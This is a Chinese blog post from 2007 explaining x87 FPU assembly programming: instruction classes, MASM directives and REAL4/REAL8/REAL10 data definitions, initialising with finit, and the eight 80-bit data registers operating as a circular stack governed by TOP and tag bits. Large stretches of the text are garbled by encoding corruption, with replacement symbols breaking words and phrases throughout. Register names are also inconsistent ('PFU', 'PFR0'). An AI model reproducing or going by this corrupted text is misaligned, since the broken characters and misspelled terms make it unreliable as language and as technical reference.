��点数据传送指令完成主存与栈顶st(0)、数据寄存器st(i)与栈��之间的��点格式数据的传送。��Q�Ҏ��据寄存器是一个首��接的堆栈�Q�所以它的数据传送实际上是对堆栈的操作，有些要改变堆栈指针TOP�Q�即修改当前栈顶�?br />2. ��术�q�算�c�L��?br /> �q�类��点指��o实现��点数�?6/32位整数的加、减、乘、除�q�算�Q�它们支持的��d��方式相同。这�l�指令还包括有关��术�q�算的指令，例如求绝对倹{��取整等�?br />3. ��越函数�c�L��?br /> ��点指��o集中包含有进行三角函数、指数和�Ҏ��q�算的指令�?br />4. ��点比较�c�L��?br /> ��点比较指��o比较栈顶数据与指定的源操作数�Q�比较结果通过��点状态寄存器反映�?br />5. FPU控制�c�L��?br /> FPU控制�c�L��令用于控制和��Q点处理单元FPU的状态及操作方式�?/p>

采用��点指��o的汇�~�语�a��E�序格式�Q�与整数指��o源程序格式是�c�M��的，但有以下几点需要注意：
· 使用FPU选择伪指�?br />      �׃��汇编�E�序MASM默认只识�?086指��o�Q�所以要加上.8087 / .287 / .387�{�伪指��o选择汇编��点指��o�Q�有�Ӟ��q�要加上相应�?238/.386�{�伪指��o�?br />· 定义��点数据
      数据定义伪指令dd(dword) / dq(qword) / dt(tbyte)依次说明32/64/80位数据；它们可以用于定义单精度、双�_�ֺ�和扩展精度��Q�Ҏ��。�ؓ了区别于整数定义�Q�MASM 6.11��采用REAL4、REAL8、REAL10定义单、双、扩展精度��Q�Ҏ��Q�但不能出现�U�整敎ͼ�其实�Q�整数后面补个小数点��可以了�Q�。相应的数据属性依�ơ是dword、qword、tbyte。另外，实常数可以用E表示10的幂�?br />· 初始化��Q点处理单�?
      每当执行一个新的��Q点程序时�Q�第一条指令都应该是初始化FPU的指令finit。该指��o清除��点数据寄存器栈和异常，为程序提供一个“干净”的初始状态。否则，遗留在��Q点寄存器栈中的数据可能会产生堆栈溢出。另一斚w��Q��Q�Ҏ��令程序段�l�束�Q�也最好清�I��Q�Ҏ��据寄存器�?/p>

��点寄存�?
��点执行环境的寄存器主要�?个通用数据寄存器和几个专用寄存器，它们是状态寄存器、控制寄存器、标记寄存器�{?br />8个��Q�Ҏ��据寄存器�Q�FPU Data Register�Q�，�~�号FPR0 ~ FPR7。每个��Q点寄存器都是80位的�Q�以扩展�_�ֺ�格式存储数据。当其他�c�d��数据压入数据寄存器时�Q�PFU自动转换成扩展精度；相反�Q�数据寄存器的数据取出时�Q�系�l�也会自动�{换成要求的数据类型�?br /> 8个��Q�Ҏ��据寄存器�l�成首尾相接的堆栈，当前栈顶ST(0)指向的FPRx��q��态寄存器中TOP字段指明。数据寄存器不采用随机存取，而是按照“后�q�先出”的堆栈原则工作�Q��ƈ且首��@环。向数据寄存器传送（Load�Q�数据时��是入栈�Q�堆栈指针TOP先减1�Q�再��数据压入栈��寄存器�Q�从数据寄存器取出（Store�Q�数据时��是出栈�Q�先��栈��寄存器数据弹出�Q�再修改堆栈指针使TOP�?。��Q点寄存器栈还有首��@环相�q�的特点。例如，若当前栈��TOP=0�Q�即ST(0) = PFR0�Q�，那么�Q�入栈操作后��׃��TOP=7�Q�即使ST(0) = PFR7�Q�，数据被压入PFR7。所以，��点数据寄存器常常被�U�Cؓ��点数据栈�?br /> ��Z��表明��点数据寄存器中数据的性质�Q�对应每个FPR寄存器，都有一�?位的标记�Q�Tag�Q�位�Q�这8个标记tag0 ~ tag7�l�成一�?6位的标记寄存器�?/p>

saga.constantine 2007-01-17 14:46 发表评论